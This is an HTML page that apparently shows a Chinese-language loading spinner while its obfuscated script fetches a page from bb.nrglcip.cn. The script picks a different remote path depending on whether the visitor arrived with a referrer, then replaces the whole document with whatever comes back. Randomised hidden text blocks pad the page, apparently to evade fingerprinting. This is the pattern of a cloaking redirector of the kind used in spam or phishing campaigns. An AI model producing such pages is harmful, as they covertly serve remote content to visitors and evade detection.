<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UgMkDfN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UgMkDfN .Qu24pu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UgMkDfN .content {
            line-height: 50px;
            text-align: center
        }

        .UgMkDfN .img {
            width: 100%
        }

        .UgMkDfN .kgsXQdgSM1J {
            text-align: center
        }

        .UgMkDfN .kgsXQdgSM1J span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UgMkDfN .kgsXQdgSM1J span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UgMkDfN .kgsXQdgSM1J span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UgMkDfN .kgsXQdgSM1J span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UgMkDfN .kgsXQdgSM1J span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UgMkDfN .kgsXQdgSM1J span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UgMkDfN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function v5NvNsHgY9hUm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LEjdw = v5NvNsHgY9hUm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LEjdw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LEjdw +".html?a=share";
		}
		
        noi0UYWtF=url+"#"+new Date().getTime();
        noi0UYWtF && function() {
            $.get(noi0UYWtF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >E4wXY50JHnKUrwutfVKIyfIQrDL9vLXxKKzPlCqKdkdm4iHVRd0rPvSl16RwBIDRStjNX5CqRKp</h1>
<span style='display:none'>cyGE7Yc6sQ4eRqm1jc8TTylagXikIsr8ahdMeLfn1Dfdcdv4hEgg90v8wK1I6sWxqpvQPuV0dKjOtTJuGg</span>
<span style='display:none'>cyGE7Yc6sQ4eRqm1jc8TTylagXikIsr8ahdMeLfn1Dfdcdv4hEgg90v8wK1I6sWxqpvQPuV0dKjOtTJuGg</span><div class="UgMkDfN">
    <div class="Qu24pu">
        <div class="kgsXQdgSM1J">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>ZqQCs23jMqERNxtJ5sMBiFXBHeaJKFqBf3YSMZjOCN4OfgS5btUENWprmsEaeS</p>
<div style='display:none'>Q1y1ho24knjseKqK2Mo1ObTENwYs4foqEhh8zfiEPUu3fMojTHhjHhJC1vfZ3zRKdqEpCVQ2sfCNM3UV</div>
<div style='display:none'>Q1y1ho24knjseKqK2Mo1ObTENwYs4foqEhh8zfiEPUu3fMojTHhjHhJC1vfZ3zRKdqEpCVQ2sfCNM3UV</div></body>
</html>